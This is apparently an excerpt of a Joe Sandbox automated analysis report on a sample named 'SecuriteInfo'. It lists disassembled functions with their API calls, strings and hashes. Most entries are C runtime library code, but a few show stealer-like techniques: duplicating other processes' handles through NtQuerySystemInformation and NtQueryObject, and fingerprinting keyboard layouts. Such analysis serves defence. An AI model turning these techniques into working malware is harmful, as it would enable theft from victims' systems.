Function 038F42EC Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,NtQuerySystemInformation,00000000,00000000,00000000,?,?,?,?,038F4574), ref: 038F4305
GetProcAddress.KERNEL32(00000000), ref: 038F430E
GetModuleHandleA.KERNEL32(ntdll,NtQueryObject,?,?,?,?,038F4574), ref: 038F431F
GetProcAddress.KERNEL32(00000000), ref: 038F4322

Part of subcall function 038F3508: EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
Part of subcall function 038F3508: GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
Part of subcall function 038F3508: RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
Part of subcall function 038F3508: LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B

OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,?,?,038F4574), ref: 038F43A4
GetCurrentProcess.KERNEL32(038F4574,00000000,00000000,00000002,?,?,?,?,038F4574), ref: 038F43C0
DuplicateHandle.KERNEL32(?,?,00000000,?,?,?,?,038F4574), ref: 038F43CF
CloseHandle.KERNEL32(038F4574,?,?,?,?,038F4574), ref: 038F43FF
GetCurrentProcess.KERNEL32(038F4574,00000000,00000000,00000001,?,?,?,?,038F4574), ref: 038F440D
DuplicateHandle.KERNEL32(?,?,00000000,?,?,?,?,038F4574), ref: 038F441C
CloseHandle.KERNEL32(?,?,?,?,?,038F4574), ref: 038F442F
CloseHandle.KERNEL32(000000FF), ref: 038F4452
CloseHandle.KERNEL32(?), ref: 038F445A

Strings

NtQuerySystemInformation, xrefs: 038F42FB
NtQueryObject, xrefs: 038F4310
ntdll, xrefs: 038F4300, 038F4317

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Handle$CloseProcess$AddressCriticalCurrentDuplicateHeapModuleProcSection$AllocateEnterLeaveOpen
String ID: NtQueryObject$NtQuerySystemInformation$ntdll
API String ID: 3110323036-2044536123
Opcode ID: d61fb418ffbcc16d206c60d171413d1012d34a5561019add4e6feec311c4213b
Instruction ID: 6f1c6102454c363e43c3b41a1a83245f4c87e9208ce393a9425394c960270dc7
Opcode Fuzzy Hash: d61fb418ffbcc16d206c60d171413d1012d34a5561019add4e6feec311c4213b
Instruction Fuzzy Hash: BD417571A01619AFDB10EBE69C44EAFFBB9EF94750F1441A6F614E7290D770CA40CBA0

Function 00773930 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00773959
_Yarn.LIBCPMTD ref: 0077396B
_Yarn.LIBCPMTD ref: 0077397A
_Yarn.LIBCPMTD ref: 00773989
_Yarn.LIBCPMTD ref: 00773998
_Yarn.LIBCPMTD ref: 007739A7
_Yarn.LIBCPMTD ref: 007739B6
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 007739CD

Part of subcall function 007CCF3B: _Yarn.LIBCPMT ref: 007CCF5A
Part of subcall function 007CCF3B: _Yarn.LIBCPMT ref: 007CCF7E

Strings

bad locale name, xrefs: 007739D7

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3904239083-1405518554
Opcode ID: 87bd7e9fad02e036b4b10c8e14443a215197860f616ddc1f23b9e84635b79a33
Instruction ID: bbcc58f3fc6a053a117a1f14ef0100afba984cacad76cb991ae7fb5cdb89b306
Opcode Fuzzy Hash: 87bd7e9fad02e036b4b10c8e14443a215197860f616ddc1f23b9e84635b79a33
Instruction Fuzzy Hash: B22151B0904289DBCF05EFA8C955BBEB771EF45308F14855CE5262B3C2CB795A10CB61

Function 038F2991 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 245COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 038F2A7C

Strings

(null), xrefs: 038F2B87
0123456789ABCDEF, xrefs: 038F29F8
(null), xrefs: 038F2B0D
0123456789abcdef, xrefs: 038F29F1

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: __aulldvrm
String ID: (null)$(null)$0123456789ABCDEF$0123456789abcdef
API String ID: 1302938615-1267642376
Opcode ID: 2bc6ee3f3f66947fce7839331feadc88616686df49062b0c324f26a1f1d581de
Instruction ID: 5c90f817bca97e66d468714d1e7e3d50af8174f00ae2905ac16860c9b8f5ca61
Opcode Fuzzy Hash: 2bc6ee3f3f66947fce7839331feadc88616686df49062b0c324f26a1f1d581de
Instruction Fuzzy Hash: B9918E74604706CFD725CF68C48462AFBE5EF84344F284DAEEA9AC7651D370E881CB51

Function 007D32E1 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 007D3400
___TypeMatch.LIBVCRUNTIME ref: 007D350E
_UnwindNestedFrames.LIBCMT ref: 007D3660
CallUnexpected.LIBVCRUNTIME ref: 007D367B

Strings

csm, xrefs: 007D3437
csm, xrefs: 007D338B
csm, xrefs: 007D331E

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 839a10e6443965dac5fe766a4bd4ecb7438fb942b69860abc053d1bc94d464e9
Instruction ID: ef3e202ab3eea290ddf654e9fac9ab336c6cd27930ece9a5f9da8c8b5ad85626
Opcode Fuzzy Hash: 839a10e6443965dac5fe766a4bd4ecb7438fb942b69860abc053d1bc94d464e9
Instruction Fuzzy Hash: D0B16971800209EFCF15DFA4D9859AEBBB5BF18310B14455BE8056B302D739DB62CFA2

Function 007E1338 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 007E15B2, 007E15B7

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 139ec6c71f8704d97e795986ed9d27e5e6cac3b53f348087f22254b577c56d57
Instruction ID: 465edd7e254de6cc741af5f6d54dcd65af044e67244822519ee13bf5b28131a5
Opcode Fuzzy Hash: 139ec6c71f8704d97e795986ed9d27e5e6cac3b53f348087f22254b577c56d57
Instruction Fuzzy Hash: 34B124B0E05289DFDB11DF9AC882BBD7BB1BF4D314F984159E4019B392C7789952CB60

Function 007D2DB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 007D2DE7
___except_validate_context_record.LIBVCRUNTIME ref: 007D2DEF
_ValidateLocalCookies.LIBCMT ref: 007D2E78
__IsNonwritableInCurrentImage.LIBCMT ref: 007D2EA3
_ValidateLocalCookies.LIBCMT ref: 007D2EF8

Strings

csm, xrefs: 007D2E8D

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: fbc6b45ee88655536bbe67d86afce7f706716a24126e87323b796c397af4cac2
Instruction ID: c2a9ea159c31b3c5e989d35903fa97d9829318bd287f9137fee2eada75468ab2
Opcode Fuzzy Hash: fbc6b45ee88655536bbe67d86afce7f706716a24126e87323b796c397af4cac2
Instruction Fuzzy Hash: 0741A634A00249EBCF10DF69C888A9EBBB5FF55314F148156E9185B392D739DE07CB91

Function 038F1F2D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 84COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNEL32 ref: 038F1F90
GetKeyboardLayoutList.USER32(00000032,?), ref: 038F1FF2

Strings

), xrefs: 038F2042
- KeyboardLayouts: ( , xrefs: 038F1FDB
- SystemLayout %d, xrefs: 038F1FCC
{%d} , xrefs: 038F2025

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: DefaultKeyboardLanguageLayoutListUser
String ID: )$- KeyboardLayouts: ( $- SystemLayout %d${%d}
API String ID: 167087913-619012376
Opcode ID: 9e3695e24b84e8a09d9cacabfea081b7fea217a374f5bba2033b846ac27999a8
Instruction ID: f7183a3fb724f4e30045a656a81a2fae9145d558e94857187e83058264ab03ac
Opcode Fuzzy Hash: 9e3695e24b84e8a09d9cacabfea081b7fea217a374f5bba2033b846ac27999a8
Instruction Fuzzy Hash: D2318F54E08298AEEB01DFE894017FDBB70EF14305F4054D6FA48EA282D77D4B55C76A

Function 007DDD94 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,D70AE4BB,?,007DDEA3,00000000,007713A5,00000000,00000000), ref: 007DDE55

Strings

api-ms-, xrefs: 007DDDEB
ext-ms-, xrefs: 007DDDFF

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: c4280d2d53c52acd790af51b1d9199623e536c0b5e8e3caceb4f4e9f80388299
Instruction ID: 0df0775416630269a86eddacc26077169282170ced6fa46c2342ac6e421b21fd
Opcode Fuzzy Hash: c4280d2d53c52acd790af51b1d9199623e536c0b5e8e3caceb4f4e9f80388299
Instruction Fuzzy Hash: FA212472A01211ABCB319B65EC84B6B3778EF557A0F244116EA16AF3D0E73CED00C6E4

Function 007CE516 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 007CE51D
std::_Lockit::_Lockit.LIBCPMT ref: 007CE527
int.LIBCPMTD ref: 007CE53E

Part of subcall function 007746D0: std::_Lockit::_Lockit.LIBCPMT ref: 007746E6
Part of subcall function 007746D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00774710

codecvt.LIBCPMT ref: 007CE561
std::_Facet_Register.LIBCPMT ref: 007CE578
std::_Lockit::~_Lockit.LIBCPMT ref: 007CE598
Concurrency::cancel_current_task.LIBCPMTD ref: 007CE5A5

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: c9af2895e76a33ff391b3e27c95bceee06c869b162da651d5e9d3461059b5b15
Instruction ID: d28378545dcea6c8360fc619fa5e15a17d05ac081cae270c6da63b3f9a68a3c2
Opcode Fuzzy Hash: c9af2895e76a33ff391b3e27c95bceee06c869b162da651d5e9d3461059b5b15
Instruction Fuzzy Hash: 8311B4B1900619DFCB11ABA4D849BAE77B5FF44720F14440DF40597281EFBCAE11CB91

Function 007CD7A8 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 007CD7AF
std::_Lockit::_Lockit.LIBCPMT ref: 007CD7B9
int.LIBCPMTD ref: 007CD7D0

Part of subcall function 007746D0: std::_Lockit::_Lockit.LIBCPMT ref: 007746E6
Part of subcall function 007746D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00774710

codecvt.LIBCPMT ref: 007CD7F3
std::_Facet_Register.LIBCPMT ref: 007CD80A
std::_Lockit::~_Lockit.LIBCPMT ref: 007CD82A
Concurrency::cancel_current_task.LIBCPMTD ref: 007CD837

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 03373f5b64e578b130d60955201d0c5bf4b05f76e1bf85bbbbb8b3a7aaaaf53c
Instruction ID: 12a31de089acf6c3cc29c0e9c0a311fc761de5c2ea95d124b1341464e811c204
Opcode Fuzzy Hash: 03373f5b64e578b130d60955201d0c5bf4b05f76e1bf85bbbbb8b3a7aaaaf53c
Instruction Fuzzy Hash: 6201ADB590011ADBCF11BBA4C849BBE77B2AF84310F14401DE415AB281DF7C9E01CBC1

Function 007CF8DE Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 007CF927
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 007CF992
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007CF9AF
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 007CF9EE
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007CFA4D
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 007CFA70

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 17c2f7509b393aa6db66e4c5a14b374a210dc27efde8214299ce2fe159ed20bb
Instruction ID: 2747bae085b5bce6fcbeb74188e70d600e878ef94c0600449a7bc6b879a9a034
Opcode Fuzzy Hash: 17c2f7509b393aa6db66e4c5a14b374a210dc27efde8214299ce2fe159ed20bb
Instruction Fuzzy Hash: 9D517F7250021AFBDF209FA4CC85FAEBBBAEB45750F15852DF909EA150D7789910CB50

Function 038F3084 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

x, xrefs: 038F33C4

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: x
API String ID: 0-2363233923
Opcode ID: de6962e585e8bc2132afb62c464bea8710c40f06c0679ec910e430ed5d1dc03b
Instruction ID: f0e9134a0d6659b527078826573309a0ee707e78400906ff24740064f1e78fd0
Opcode Fuzzy Hash: de6962e585e8bc2132afb62c464bea8710c40f06c0679ec910e430ed5d1dc03b
Instruction Fuzzy Hash: 5C02AC78E00609EFCB41DFA8C984AADB7F4FF09305F1484A6E966EB250D770AA51CF51

Function 007D2FAA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,007D2FA1,007D16DC,007D0672), ref: 007D2FB8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007D2FC6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007D2FDF
SetLastError.KERNEL32(00000000,007D2FA1,007D16DC,007D0672), ref: 007D3031

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2d1aab959126a954e110e75b37ac77c545aa8dc790cf5f83efdbbcce18639831
Instruction ID: 00624b0cff26e524b602c1f80d38e688ccf47d823b8acff7758a11753fbf3b05
Opcode Fuzzy Hash: 2d1aab959126a954e110e75b37ac77c545aa8dc790cf5f83efdbbcce18639831
Instruction Fuzzy Hash: F401D872109321BE96252B78BD89B2B2775EB617B0720432BF114953E1FE6E4C01924A

Function 007D80CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D70AE4BB,?,?,00000000,007E8AEC,000000FF,?,007D80A8,?,?,007D807C,00000000), ref: 007D8101
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007D8113
FreeLibrary.KERNEL32(00000000,?,00000000,007E8AEC,000000FF,?,007D80A8,?,?,007D807C,00000000), ref: 007D8135

Strings

mscoree.dll, xrefs: 007D80FA
CorExitProcess, xrefs: 007D810B

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: e06b097b7dcd22dc610755165f7d3105cd9574facb29c48d81b6455936aa0ce4
Instruction ID: 3710ab23da2067abc0d29f125130692535706dd87ad757d698391bbd0952f4f4
Opcode Fuzzy Hash: e06b097b7dcd22dc610755165f7d3105cd9574facb29c48d81b6455936aa0ce4
Instruction Fuzzy Hash: 6601A772505569EFCB119F51CC45BAFBBB8FB0C710F00452AE911A22A0EF7D9800CA65

Function 00771E20 Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00771E40
int.LIBCPMTD ref: 00771E59

Part of subcall function 007746D0: std::_Lockit::_Lockit.LIBCPMT ref: 007746E6
Part of subcall function 007746D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00774710

Concurrency::cancel_current_task.LIBCPMTD ref: 00771E99
std::_Lockit::~_Lockit.LIBCPMT ref: 00771F01

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: f1f6fa881a8de4618a56146c31bad7a19c3d9a46f0c9165eb3c8fd8d3712ed68
Instruction ID: 8b24a29ea8149e390c881ee91d027c35b18f0992b39a405f1471eb6573f3a980
Opcode Fuzzy Hash: f1f6fa881a8de4618a56146c31bad7a19c3d9a46f0c9165eb3c8fd8d3712ed68
Instruction Fuzzy Hash: FC312EB0D00249DBCF04EF98D995BEEB7B4BF08310F608219E91567391DB785A44CBA1

Function 00771F20 Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00771F40
int.LIBCPMTD ref: 00771F59

Part of subcall function 007746D0: std::_Lockit::_Lockit.LIBCPMT ref: 007746E6
Part of subcall function 007746D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00774710

Concurrency::cancel_current_task.LIBCPMTD ref: 00771F99
std::_Lockit::~_Lockit.LIBCPMT ref: 00772001

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: a36e266e7a1176c8744d56264779aeab9a43b38e2d2cb550e2181579220d6bda
Instruction ID: 34f6488eb2e5476660ff33fe989d61787efbb02a7e930e6f13702130d9e5b487
Opcode Fuzzy Hash: a36e266e7a1176c8744d56264779aeab9a43b38e2d2cb550e2181579220d6bda
Instruction Fuzzy Hash: 02312BB1D00249DFCF14EF98D985BEEBBB4BF08310F208219E51567391DB386A04CBA1

Function 007CCE3D Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 007CCE44
std::_Lockit::_Lockit.LIBCPMT ref: 007CCE4F
std::_Lockit::~_Lockit.LIBCPMT ref: 007CCEBD

Part of subcall function 007CCFA0: std::locale::_Locimp::_Locimp.LIBCPMT ref: 007CCFB8

std::locale::_Setgloballocale.LIBCPMT ref: 007CCE6A
_Yarn.LIBCPMT ref: 007CCE80

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: f18bb5cf51b06ab0701104b16046a8cfe5abcdc96f2573dad74db346e83da432
Instruction ID: 255b7025218a0d860f9050b8605a8a9e8a6098fc6076e86a76015c68f2fb4086
Opcode Fuzzy Hash: f18bb5cf51b06ab0701104b16046a8cfe5abcdc96f2573dad74db346e83da432
Instruction Fuzzy Hash: 06017CB6A01255DBC706AF60D899B7D7B62BF89340B18801DE90657381DF7CAE42CBC9

Function 007D4072 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
